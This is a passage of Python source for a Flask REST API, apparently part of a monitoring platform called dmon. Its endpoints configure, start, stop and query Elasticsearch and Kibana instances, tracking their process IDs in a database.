confDict['Status'] = 'unknown' #TODO: Document failed message if PID is not assigned to an ES Instance
confDict['PID'] = 0
app.logger.warning('[%s] : [WARN] ES Core service not found, setting to unknown',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
confDict['MasterNode'] = hosts[8]
confDict['DataNode'] = hosts[9]
confDict['NumOfShards'] = hosts[10]
confDict['NumOfReplicas'] = hosts[11]
confDict['FieldDataCacheSize'] = hosts[12]
confDict['FieldDataCacheExpire'] = hosts[13]
confDict['FieldDataCacheFilterSize'] = hosts[14]
confDict['FieldDataCacheFilterExpires'] = hosts[15]
confDict['IndexBufferSize'] = hosts[16]
confDict['MinShardIndexBufferSize'] = hosts[17]
confDict['MinIndexBufferSize'] = hosts[18]
confDict['ESCoreDebug'] = hosts[19]
confDict['ESCoreHeap'] = hosts[20]
resList.append(confDict)
response = jsonify({'ES Instances': resList})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
esTemp = os.path.join(tmpDir, 'elasticsearch.tmp') # tmpDir+"/collectd.tmp"
esfConf = os.path.join(cfgDir, 'elasticsearch.yml')
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO -> currently only generates config file for master node
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
return response
if checkPID(qESCore.ESCorePID) is True:
subprocess.call(["kill", "-15", str(qESCore.ESCorePID)])
try:
template = templateEnv.get_template(esTemp)
# print >>sys.stderr, template
except:
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable!'})
response.status_code = 500
app.logger.error("[%s] : [ERROR] Cannot load es core template at location %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esTemp)
return response
infoESCore = {"clusterName": qESCore.clusterName, "nodeName": qESCore.nodeName, "esLogDir": logDir,
"MasterNode": qESCore.MasterNode, "DataNode": qESCore.DataNode,
"NumberOfShards": qESCore.NumOfShards, "NumberOfReplicas": qESCore.NumOfReplicas,
"IndexBufferSize": qESCore.IndexBufferSize,
"MinShardIndexBufferSize": qESCore.MinShardIndexBufferSize,
"MinIndexBufferSize": qESCore.MinIndexBufferSize,
"FieldDataCacheSize": qESCore.FieldDataCacheSize,
"FieldDataCacheExpires": qESCore.FieldDataCacheExpires,
"FieldDataCacheFilterSize": qESCore.FieldDataCacheFilterSize,
"FieldDataCacheFilterExpires": qESCore.FieldDataCacheFilterExpires,
"ESCoreDebug": qESCore.ESCoreDebug}
esConf = template.render(infoESCore)
qESCore.conf = esConf
# print >>sys.stderr, esConf
db.session.commit()
esCoreConf = open(esfConf, "w+")
esCoreConf.write(esConf)
esCoreConf.close()
# TODO find better solution
os.system('rm -rf /opt/elasticsearch/config/elasticsearch.yml')
os.system('cp ' + esfConf + ' /opt/elasticsearch/config/elasticsearch.yml ')
os.environ['ES_HEAP_SIZE'] = qESCore.ESCoreHeap
esPid = 0
try:
esPid = subprocess.Popen('/opt/elasticsearch/bin/elasticsearch',
stdout=subprocess.PIPE, close_fds=True).pid # TODO: Try -p to set pid file location and -d for daemon
except Exception as inst:
# print >> sys.stderr, 'Error while starting elasticsearch'
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error("[%s] : [ERROR] Cannot start ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start ES Core'})
response.status_code = 500
return response
qESCore.ESCorePID = esPid
qESCore.ESCoreStatus = 'Running'
# ES core pid location
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
try:
esPIDFile = open(pidESLoc, 'w+')
esPIDFile.write(str(esPid))
esPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
response = jsonify({'Status': 'ElasticSearch Core PID ' + str(esPid)})
response.status_code = 200
return response
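# Note on v1 vs v2 behaviour: the v1 POST above launches Elasticsearch directly via
# subprocess.Popen on /opt/elasticsearch/bin/elasticsearch, while the v2 resource below
# delegates start/restart to the 'dmon-es' service script and reconciles the PID recorded
# in the database with the one found in <pidDir>/elasticsearch.pid.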
@dmon.route('/v2/overlord/core/es')
class ESCoreControllerInit(Resource):
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
esTemp = os.path.join(tmpDir, 'elasticsearch.tmp') # tmpDir+"/collectd.tmp"
esfConf = os.path.join(cfgDir, 'elasticsearch.yml')
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO -> currently only generates config file for master node
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
return response
# if checkPID(qESCore.ESCorePID) is True:
# subprocess.call(["kill", "-15", str(qESCore.ESCorePID)])
try:
template = templateEnv.get_template(esTemp)
except:
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable!'})
response.status_code = 500
app.logger.error("[%s] : [ERROR] Cannot load es core template at location %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esTemp)
return response
infoESCore = {"clusterName": qESCore.clusterName, "nodeName": qESCore.nodeName, "esLogDir": logDir,
"MasterNode": qESCore.MasterNode, "DataNode": qESCore.DataNode,
"NumberOfShards": qESCore.NumOfShards, "NumberOfReplicas": qESCore.NumOfReplicas,
"IndexBufferSize": qESCore.IndexBufferSize,
"MinShardIndexBufferSize": qESCore.MinShardIndexBufferSize,
"MinIndexBufferSize": qESCore.MinIndexBufferSize,
"FieldDataCacheSize": qESCore.FieldDataCacheSize,
"FieldDataCacheExpires": qESCore.FieldDataCacheExpires,
"FieldDataCacheFilterSize": qESCore.FieldDataCacheFilterSize,
"FieldDataCacheFilterExpires": qESCore.FieldDataCacheFilterExpires,
"ESCoreDebug": qESCore.ESCoreDebug}
esConf = template.render(infoESCore)
qESCore.conf = esConf
# print >>sys.stderr, esConf
db.session.commit()
esCoreConf = open(esfConf, "w+")
esCoreConf.write(esConf)
esCoreConf.close()
# TODO find better solution
os.system('rm -rf /opt/elasticsearch/config/elasticsearch.yml')
os.system('cp ' + esfConf + ' /opt/elasticsearch/config/elasticsearch.yml ')
os.environ['ES_HEAP_SIZE'] = qESCore.ESCoreHeap
#check for running detached es core
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
else:
esPIDf = 0
if esPIDf != qESCore.ESCorePID:
app.logger.warning("[%s] : [WARN] Conflicting PID values found, detached pid -> %s, attached -> %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(esPIDf),
str(qESCore.ESCorePID))
if checkPID(qESCore.ESCorePID) is True:
try:
subprocess.check_call(["service", "dmon-es", "restart", qESCore.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart ES Core'})
response.status_code = 500
return response
esPID = check_proc_recursive(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCore.ESCorePID = esPID
qESCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Restarted', 'PID': esPID})
response.status_code = 201
return response
elif checkPID(int(esPIDf)) is True:
try:
subprocess.check_call(["service", "dmon-es", "restart", qESCore.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart detached ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart detached ES Core'})
response.status_code = 500
return response
esPID = check_proc(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCore.ESCorePID = esPID
qESCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Restarted and attached', 'PID': esPID})
response.status_code = 201
return response
else:
try:
subprocess.check_call(["service", "dmon-es", "start", qESCore.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start ES Core'})
response.status_code = 500
return response
esPID = check_proc(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCore.ESCorePID = esPID
qESCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Started', 'PID': esPID})
response.status_code = 201
return response
# response = jsonify({'Status': 'ElasticSearch Core PID ' + str(esPid)})
# response.status_code = 200
# return response
@dmon.route('/v2/overlord/core/es/<hostFQDN>/start')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStartInit(Resource):
def post(self, hostFQDN):
qESCoreStart = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
if qESCoreStart is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qESCoreStart.ESCorePID) is True:
proc = psutil.Process(qESCoreStart.ESCorePID)
if proc.status() == psutil.STATUS_ZOMBIE:
# print >> sys.stderr, 'Process ' + str(qESCoreStart.ESCorePID) + ' is zombie!'
app.logger.warning("[%s] : [WARN] Process %s is zombie!",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qESCoreStart.ESCorePID))
else:
app.logger.info("[%s] : [INFO] ES Core alredy running with pid %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qESCoreStart.ESCorePID))
response = jsonify({'Status': 'Detected ES Core instance', 'PID': qESCoreStart.ESCorePID})
response.status_code = 200
return response
os.environ['ES_HEAP_SIZE'] = qESCoreStart.ESCoreHeap
# check for running detached es core
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
else:
esPIDf = 0
if esPIDf != qESCoreStart.ESCorePID:
app.logger.warning("[%s] : [WARN] Conflicting PID values found, detached pid -> %s, attached -> %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(esPIDf),
str(qESCoreStart.ESCorePID))
elif checkPID(int(esPIDf)) is True:
app.logger.info("[%s] : [INFO] ES Core alredy running with detached pid %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qESCoreStart.ESCorePID))
response = jsonify({'Status': 'Detected detached ES Core instance', 'PID': esPIDf})
response.status_code = 200
return response
else:
try:
subprocess.check_call(["service", "dmon-es", "start", qESCoreStart.ESCoreHeap])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start ES Core'})
response.status_code = 500
return response
esPID = check_proc(pidESLoc)
if not esPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for es core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read escore pid file'})
response.status_code = 500
return response
qESCoreStart.ESCorePID = esPID
qESCoreStart.ESCoreStatus = 'Running'
response = jsonify({'Status': 'ES Core Started', 'PID': esPID})
response.status_code = 201
return response
@dmon.route('/v2/overlord/core/es/<hostFQDN>/stop')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStopInit(Resource):
def post(self, hostFQDN):
qESCoreStop = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
if qESCoreStop is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
# check for running detached es core
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
else:
esPIDf = 0
if checkPID(qESCoreStop.ESCorePID) is True:
# os.kill(qESCoreStop.ESCorePID, signal.SIGTERM)
try:
subprocess.check_call(["service", "dmon-es", "stop"])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot stop ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot stop ES Core'})
response.status_code = 500
return response
qESCoreStop.ESCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped ES instance at ' + str(qESCoreStop.ESCorePID)})
app.logger.info('[%s] : [INFO] Stopped ES instance with pid %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qESCoreStop.ESCorePID)
response.status_code = 200
return response
elif checkPID(esPIDf) is True:
try:
subprocess.check_call(["service", "dmon-es", "stop"])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot stop detached ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot stop ES Core'})
response.status_code = 500
return response
qESCoreStop.ESCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped detached ES instance at ' + str(qESCoreStop.ESCorePID)})
app.logger.info('[%s] : [INFO] Stopped ES instance with pid %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qESCoreStop.ESCorePID)
response.status_code = 200
return response
else:
qESCoreStop.ESCoreStatus = 'unknown'
response = jsonify({'Status': 'No ES Instance Found',
'Message': 'No ES instance with PID ' + str(qESCoreStop.ESCorePID)})
response.status_code = 404
return response
@dmon.route('/v1/overlord/core/es/status/<intComp>/property/<intProp>')
@api.doc(params={'intComp': 'ES specific component', 'intProp': 'Component specific property'})
class ESControllerStatus(Resource):
def get(self, intComp, intProp):
compList = ['cluster', 'shards']
propList = ['health', 'stats', 'pending_tasks', 'list']
if intComp not in compList:
response = jsonify({'Status': 'Invalid argument',
'Message': 'Argument ' + intComp + ' not supported'})
response.status_code = 400
return response
if intProp not in propList:
response = jsonify({'Status': 'Invalid argument',
'Message': 'Argument ' + intProp + ' not supported'})
response.status_code = 400
return response
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
return response
if intComp == 'cluster':
try:
esCoreUrl = 'http://%s:%s/%s/%s' % (qESCore.hostIP, qESCore.nodePort, '_cluster', intProp)
app.logger.info('[%s] : [INFO] ES Core Url set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esCoreUrl)
# print >> sys.stderr, esCoreUrl
r = requests.get(esCoreUrl, timeout=DMON_TIMEOUT) # timeout in seconds
data = r.json()
except:
app.logger.error('[%s] : [ERROR] Master ES instance unreachable at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esCoreUrl)
response = jsonify({"Error": "Master ES instances not reachable!"})
response.status_code = 500
return response
elif intComp == 'shards' and intProp == 'list':
try:
shardUrl = 'http://%s:%s/%s/%s' % (qESCore.hostIP, qESCore.nodePort, '_cat', intComp)
app.logger.info("[%s] : [INFO] Shard URL set to %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), shardUrl)
# print >> sys.stderr, shardUrl
r = requests.get(shardUrl, timeout=DMON_TIMEOUT)
data = r.text
except:
response = jsonify({"Error": "Master ES instances not reachable!"})
response.status_code = 500
return response
else:
response = jsonify({"Status": "Mallformed request"})
response.status_code = 400
return response
return data
@dmon.route('/v1/overlord/core/es/index/<index>')
class ESControllerIndex(Resource):
def get(self, index):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.getIndexSettings(index)
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get index settings'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/cluster/health')
class ESControllerClusterHealth(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.clusterHealth()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get cluster health'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/cluster/settings')
class ESControllerClusterSettings(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.clusterSettings()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get cluster settings'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/cluster/state')
class ESControllerClusterState(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.clusterState()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get cluster state'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/node/master/info')
class ESControllerNodeInfo(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.nodeInfo()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get node info'})
response.status_code = 500
return response
@dmon.route('/v1/overlord/core/es/node/master/state')
class ESControllerNodeState(Resource):
def get(self):
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
app.logger.error('[%s] : [ERROR] Master ES instance not set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Missing es core',
'Message': 'ES core instance not set'})
response.status_code = 503
return response
ecc = ESCoreConnector(esEndpoint=qES.hostIP)
res = ecc.nodeState()
if res:
response = jsonify(res)
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Error',
'Message': 'Cannot get node state'})
response.status_code = 500
return response
# todo add node state and info for each registered node
@dmon.route('/v1/overlord/core/es/<hostFQDN>/status')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStatusSpecific(Resource):
def get(self, hostFQDN):
qESCoreStatus = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCoreStatus is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
pid = qESCoreStatus.ESCorePID
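# A PID of 0 means the instance was never started by dmon; any other dead PID marks the instance as Stopped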
if not checkPID(pid):
if pid != 0:
qESCoreStatus.ESCoreStatus = 'Stopped'
else:
qESCoreStatus.ESCoreStatus = 'unknown'
response = jsonify({'Status': qESCoreStatus.ESCoreStatus,
'PID': qESCoreStatus.ESCorePID})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/es/<hostFQDN>/start')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStart(Resource):
def post(self, hostFQDN):
qESCoreStart = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCoreStart is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qESCoreStart.ESCorePID) is True:
proc = psutil.Process(qESCoreStart.ESCorePID)
if proc.status() == psutil.STATUS_ZOMBIE:
# print >> sys.stderr, 'Process ' + str(qESCoreStart.ESCorePID) + ' is zombie!'
app.logger.warning("[%s] : [WARN] Process %s is zombie!",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qESCoreStart.ESCorePID))
else:
response = jsonify({'Status': 'ES already Running',
'PID': str(qESCoreStart.ESCorePID)})
response.status_code = 200
return response
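# Launch a new ES process and record its PID both in the DB and in elasticsearch.pid so later calls can re-attach or stop it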
esPid = 0
try:
esPid = subprocess.Popen('/opt/elasticsearch/bin/elasticsearch',
stdout=subprocess.PIPE).pid # TODO: Try -p to set pid file location
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start ES core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'error', 'Message': 'Cannot start ES Core instance'})
response.status_code = 500
return response
# print >> sys.stderr, 'Error while starting elasticsearch'
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
qESCoreStart.ESCorePID = esPid
qESCoreStart.ESCoreStatus = 'Running'
# ES core pid location
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
try:
esPIDFile = open(pidESLoc, 'w+')
esPIDFile.write(str(esPid))
esPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
response = jsonify({'Status': 'ElasticSearch Core PID ' + str(esPid)})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/es/<hostFQDN>/stop')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESControllerStop(Resource):
def post(self, hostFQDN):
qESCoreStop = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCoreStop is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qESCoreStop.ESCorePID) is True:
os.kill(qESCoreStop.ESCorePID, signal.SIGTERM)
qESCoreStop.ESCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped ES instance at ' + str(qESCoreStop.ESCorePID)})
response.status_code = 200
return response
else:
qESCoreStop.ESCoreStatus = 'unknown'
response = jsonify({'Status': 'No ES Instance Found',
'Message': 'No ES instance with PID ' + str(qESCoreStop.ESCorePID)})
response.status_code = 404
return response
@dmon.route('/v1/overlord/core/kb/config')
class KBCoreConfiguration(Resource):
def get(self):
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
return response
if not os.path.isfile(os.path.join(cfgDir, 'kibana.yml')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
lsCfgfile = open(os.path.join(cfgDir, 'kibana.yml'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return send_file(lsCfgfile, mimetype='text/yaml', as_attachment=True)
@api.expect(kbCore) # TODO same for all 3 core services create one class for all
def put(self):
requiredKeys = ['HostFQDN', 'IP']
if not request.json:
abort(400)
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
return response
qKBCore = dbKBCore.query.filter_by(hostIP=request.json['IP']).first()
if request.json["OS"] is None:
os = "unknown"
else:
os = request.json["OS"]
if qKBCore is None:
upKB = dbKBCore(hostFQDN=request.json["HostFQDN"], hostIP=request.json["IP"],
hostOS=os, kbPort=request.json["KBPort"], KBCoreStatus='Stopped')
db.session.add(upKB)
db.session.commit()
response = jsonify({'Added': 'KB Config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
else:
qKBCore.hostOS = os
qKBCore.kbPort = request.json['KBPort']
db.session.commit()
response = jsonify({'Updated': 'KB config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/kb')
class KBCoreController(Resource):
def get(self):
KBhostsAll = db.session.query(dbKBCore.hostFQDN, dbKBCore.hostIP, dbKBCore.hostOS,
dbKBCore.kbPort, dbKBCore.KBCorePID, dbKBCore.KBCoreStatus).all()
resList = []
for hosts in KBhostsAll:
confDict = {}
confDict['HostFQDN'] = hosts[0]
confDict['IP'] = hosts[1]
confDict['OS'] = hosts[2]
confDict['KBPort'] = hosts[3]
if checkPID(hosts[4]):
confDict['Status'] = hosts[5]
confDict['PID'] = hosts[4]
else:
app.logger.warning('[%s] : [WARN] KB Core service not found at PID %s, setting to failed',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(hosts[4]))
#hosts.ESCorePID = 0
#hosts.ESCoreStatus = 'unknown'
confDict['Status'] = 'failed' # TODO: Document failed message if PID is not assigned to a KB Instance
confDict['PID'] = 0
resList.append(confDict)
response = jsonify({'KB Instances': resList})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
kbTemp = os.path.join(tmpDir, 'kibana.tmp') # tmpDir+"/collectd.tmp"
kbfConf = os.path.join(cfgDir, 'kibana.yml')
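# Render kibana.yml from the template, persist it to the DB and config dir, copy it into /opt/kibana/config and (re)start Kibana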
qKBCore = dbKBCore.query.first()
if qKBCore is None:
response = jsonify({"Status": "No KB instance found!"})
response.status_code = 500
return response
if checkPID(qKBCore.KBCorePID) is True:
subprocess.call(["kill", "-9", str(qKBCore.KBCorePID)])
try:
template = templateEnv.get_template(kbTemp)
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable'})
response.status_code = 500
return response
# Log and PID location for kibana
kbPID = os.path.join(pidDir, 'kibana.pid')
kbLog = os.path.join(logDir, 'kibana.log')
infoKBCore = {"kbPort": qKBCore.kbPort, "kibanaPID": kbPID, "kibanaLog": kbLog}
kbConf = template.render(infoKBCore)
qKBCore.conf = kbConf
# print >>sys.stderr, esConf
db.session.commit()
kbCoreConf = open(kbfConf, "w+")
kbCoreConf.write(kbConf)
kbCoreConf.close()
# TODO find better solution
os.system('rm -rf /opt/kibana/config/kibana.yml')
os.system('cp ' + kbfConf + ' /opt/kibana/config/kibana.yml ')
kbPid = 0
FNULL = open(os.devnull, 'w')
try:
kbPid = subprocess.Popen('/opt/kibana/bin/kibana', stdout=FNULL, stderr=subprocess.STDOUT).pid
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Cannot start KB core service with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error', 'Message': 'Cannot start Kibana Core'})
response.status_code = 500
return response
qKBCore.KBCorePID = kbPid
qKBCore.KBCoreStatus = 'Running'
response = jsonify({'Status': 'Kibana Core PID ' + str(kbPid)})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/kb/visualisations')
class KBVisualisations(Resource):
def get(self):
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({'Status': 'ES Core not registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] ES Core not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
ecc = ESCoreConnector(esEndpoint=qESCore.hostIP, index='.kibana')
query = {"query": {"match_all": {}}, "size": 500}
rsp = ecc.aggQuery('.kibana', queryBody=query)
if not rsp:
app.logger.error('[%s] : [ERROR] ES Core unreachable',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'ES Core unreachable'})
response.status_code = 503
return response
foundv = []
for hits in rsp['hits']['hits']:
if hits['_type'] == 'visualization':
foundv.append(hits['_source']['title'])
response = jsonify({'Visualisations': foundv})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
kbVisTemp = os.path.join(tmpDir, 'visualizations')
qNode = dbNodes.query.all()
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({'Status': 'ES Core not registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] ES Core not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
